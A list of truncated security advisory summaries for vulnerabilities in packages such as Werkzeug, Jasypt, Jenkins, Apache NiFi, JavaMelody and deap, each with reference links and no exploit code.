Cross-site scripting (XSS) vulnerability in the render_full function in debug/tbtools.py in the debugger in Pallets Werkzeug before 0.11.11 (as used in Pallets Flask and other products) allows remote attackers to inject arbitrary web script or HTML via…
[org.jasypt:jasypt] Exposure of Sensitive Information to an Unauthorized Actor in Apache Jasypt
jasypt before 1.9.2 allows a timing attack against the password hash comparison.
References
https://nvd.nist.gov/vuln/detail/CVE-2014-9970
https://access.redhat.com/errata/RHSA-2017:2546
https://access.redhat.com/errata/RHSA-2017:2547
https://access.r…
[org.jenkins-ci.main:jenkins-core] Deserialization of Untrusted Data in Jenkins
Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an XStream: Java crash when trying to instantiate void/Void.
References
https://nvd.nist.gov/vuln/detail/CVE-2017-1000355
https://jenkins.io/security/advisory/2017-0…
[org.jenkins-ci.main:jenkins-core] Cross-Site Request Forgery in Jenkins
Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an issue in the Jenkins user database authentication realm: create an account if signup is enabled; or create an account if the victim is an administrator, possibly d…
[org.jenkins-ci.main:jenkins-core] Improper Authentication in Jenkins
Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to a login command which allowed impersonating any Jenkins user. The login command available in the remoting-based CLI stored the encrypted user name of the successfully…
[org.jenkins-ci.plugins:junit] Improper Restriction of XML External Entity Reference in Jenkins JUnit Plugin
Jenkins JUnit Plugin 1.23 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, …
[django-anymail] django-anymail Includes Sensitive Information in Log Files
Anymail django-anymail version version 0.2 through 1.3 contains a CWE-532, CWE-209 vulnerability in WEBHOOK_AUTHORIZATION setting value that can result in An attacker with access to error logs could fabricate email tracking events. This attack appear t…
[org.apache.nifi:nifi] Improper Restriction of XML External Entity Reference in Apache NiFi
Apache NiFi External XML Entity issue in SplitXML processor. Malicious XML content could cause information disclosure or remote code execution. The fix to disable external general entity parsing and disallow doctype declarations was applied on the Apac…
[net.bull.javamelody:javamelody-core] Cross-site Scripting in JavaMelody
JavaMelody through 1.60.0 has XSS via the counter parameter in a clear_counter action to the /monitoring URI.
References
https://nvd.nist.gov/vuln/detail/CVE-2018-12432
https://github.com/Hurdano/JavaMelody-XSS/wiki/Attack-Vector—JavaMelody
https://…
[deap] Improper Input Validation in Deap
The utilities function in all versions < 1.0.1 of the deap node module can be tricked into modifying the prototype of Object when the attacker can control part of the structure passed to this function. This can let an attacker add or modify existing…